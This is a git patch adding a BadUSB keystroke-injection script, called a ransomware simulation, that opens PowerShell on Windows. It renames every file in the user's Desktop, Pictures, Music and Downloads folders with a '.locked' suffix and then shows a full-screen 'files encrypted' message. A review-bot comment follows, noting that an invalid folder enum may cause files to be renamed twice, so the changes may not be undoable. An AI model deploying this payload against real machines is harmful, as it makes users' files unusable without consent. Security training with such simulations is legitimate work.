From e8a708408e614b268093919b04b786a30b5c02de Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:27:41 -0400
Subject: [PATCH] Create RansomwareSimulation1.txt
---
.../RansomwareSimulation1.txt | 91 +++++++++++++++++++
1 file changed, 91 insertions(+)
create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
new file mode 100644
index 00000000..b35bd533
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
@@ -0,0 +1,91 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 1000
+REM opens powershell (this is for windows machines)
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 500
+ENTER
+DELAY 500
+STRING )
+DELAY 500
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 500
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 500
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+DELAY 500
+ENTER
+DELAY 500
+STRING }
+DELAY 500
+ENTER
+DELAY 2000
+REM Display ransomware message
+STRING Add-Type -AssemblyName PresentationFramework
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+DELAY 500
+ENTER
+DELAY 2000
+STRING exit
+DELAY 500
+ENTER
+REM check out my github at github.com/markcyber for more badusb & hacking type tools
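Review bot: The last entry of the `$folders` array, `[System.Environment+SpecialFolder]::Downloads`, is not a member of the `Environment.SpecialFolder` enum, so that element most likely evaluates to `$null` and the `GetFolderPath($folder)` call fails for it. In that case `$path` would probably still hold the previous folder, and the `Get-ChildItem … Rename-Item` line would append `.locked` a second time to files it has already renamed. The cleanup script named in the header is not visible here, so confirm it reverts a doubled suffix; if it does not, a "simulation" run leaves real user files in a state it cannot undo. Drop the `Downloads` entry so every element is a valid enum value. The header REM block should also say that the payload renames real files in the logged-in user's folders and is meant only for an authorized test machine with disposable data.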